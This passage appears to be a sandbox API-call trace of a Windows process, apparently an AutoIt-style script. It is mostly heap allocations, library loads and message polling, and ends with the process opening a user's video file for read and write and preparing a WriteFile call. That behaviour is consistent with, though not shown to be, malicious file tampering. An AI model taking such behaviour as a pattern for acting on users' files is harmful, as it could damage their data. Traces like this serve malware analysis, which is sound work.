Flags=0x0, Size=0x10) returned 0x9bd3a8 [0196.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0196.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0196.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0196.764] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0196.764] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0196.764] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0196.764] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0196.764] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0196.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0196.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0196.764] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0196.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7) returned 0x8e1900 [0196.764] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x8e1900, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0196.764] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0196.764] GetProcAddress (hModule=0x75c90000, lpProcName="memset") returned 0x75c99790 [0196.764] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0196.764] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0196.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0196.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0196.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0196.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0196.764] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0196.765] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0196.765] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0196.765] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0196.765] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0196.765] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0196.765] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0196.765] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0196.765] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0196.765] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0196.765] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0196.765] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0196.765] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0196.765] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0196.765] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0196.765] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0196.765] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0196.765] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0196.765] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0196.765] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0196.765] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0196.765] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0196.765] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0196.765] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0196.765] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0196.765] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0196.765] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0196.765] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0196.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0196.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0196.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0196.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0196.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0196.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0196.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0196.766] FreeLibrary (hLibModule=0x75c90000) returned 1 [0196.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0196.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0196.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0196.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0196.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0196.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0196.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0196.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0196.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0196.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0196.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0196.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0196.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0196.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0196.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0196.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0196.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0196.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0196.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0196.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0196.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0196.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0196.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0196.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0196.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0196.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0196.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0196.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0196.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0196.767] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0196.767] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0196.767] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0196.767] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0196.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0196.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0196.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0196.767] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0196.767] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0196.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0196.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0196.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0196.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0196.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0196.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0196.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0196.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0196.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0196.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0196.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0196.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0196.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0196.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0196.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0196.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0196.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0196.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0196.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0196.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0196.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0196.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0196.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0196.768] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0196.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0196.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0196.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0196.768] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0196.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0196.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0196.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0196.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e18c0 [0196.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0196.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0196.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0196.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0196.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0196.769] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e18b0 [0196.769] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0196.769] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0196.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0196.769] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1770 [0196.769] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0196.769] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0196.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0196.769] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd630 [0196.769] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0196.769] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0196.769] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0196.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0196.769] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0196.769] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0196.769] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0196.769] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0196.769] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0196.769] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0196.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0196.769] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0196.769] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0196.769] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0196.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0196.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0196.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0196.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0196.770] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0196.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0196.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0196.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0196.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0196.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0196.770] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0196.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0196.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0196.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0196.770] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0196.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0196.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0196.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0196.770] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0196.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0196.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0196.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0196.770] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0196.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0196.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0196.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0196.771] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0196.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0196.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0196.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0196.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0196.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0196.771] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0196.771] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0196.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0196.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0196.772] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.772] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.772] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.772] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.772] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.772] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.772] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.772] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.772] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.772] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0196.772] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.772] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.772] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.772] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.772] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.772] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0196.773] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0196.774] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\RIN_E.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\fokjzmjbm6_f0eozyzo\\4_l5nhx538ki1\\rin_e.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0196.774] FreeLibrary (hLibModule=0x75990000) returned 1 [0196.774] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.774] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.774] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0196.774] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0196.774] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0196.774] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0196.774] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0196.775] FreeLibrary (hLibModule=0x75990000) returned 1 [0196.775] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 